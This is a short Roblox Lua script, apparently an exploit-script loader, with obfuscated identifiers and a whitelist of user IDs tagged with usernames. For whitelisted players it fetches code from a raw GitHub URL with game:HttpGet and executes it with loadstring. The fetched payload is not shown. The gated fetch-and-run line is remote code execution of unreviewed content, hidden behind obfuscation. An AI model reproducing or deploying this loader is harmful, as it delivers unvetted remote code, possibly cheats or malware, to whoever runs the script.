local a8K3L9n4o2t6e5r4a3s2d1f9g8h7j6k5l4m3n2o1p9q8r7s6t5u4v3w2x1y9z8 = {
    [7237337550] = true, --SuperOldman69X    
    [4499225350] = true, --SBIKASBIKA
    [12906862] = true, --Arda
    [583116786] = true, --Piercer
    [7162991400] = true, --NC_Gurdian1
    [7243740345] = true, --shiii
    [4654827895] = true, --Haram
    [4298015048] = true, --Feast
    [3552067237] = true, --opro_ahmed
    [6190239140] = true, --Ezzzzz_ClientNN
    [7181624960] = true,
}

local function K9L8P3a2t6e5r4a3s2d1f9g8h7j6k5l4m3n2o1p9q8r7s6t5u4v3w2x1y9z8(c)
    return a8K3L9n4o2t6e5r4a3s2d1f9g8h7j6k5l4m3n2o1p9q8r7s6t5u4v3w2x1y9z8[c.UserId]
end

if K9L8P3a2t6e5r4a3s2d1f9g8h7j6k5l4m3n2o1p9q8r7s6t5u4v3w2x1y9z8(game.Players.LocalPlayer) then
    print("hi1")
loadstring(game:HttpGet("https://raw.githubusercontent.com/asdoiaeqp9/2/main/2"))()

end
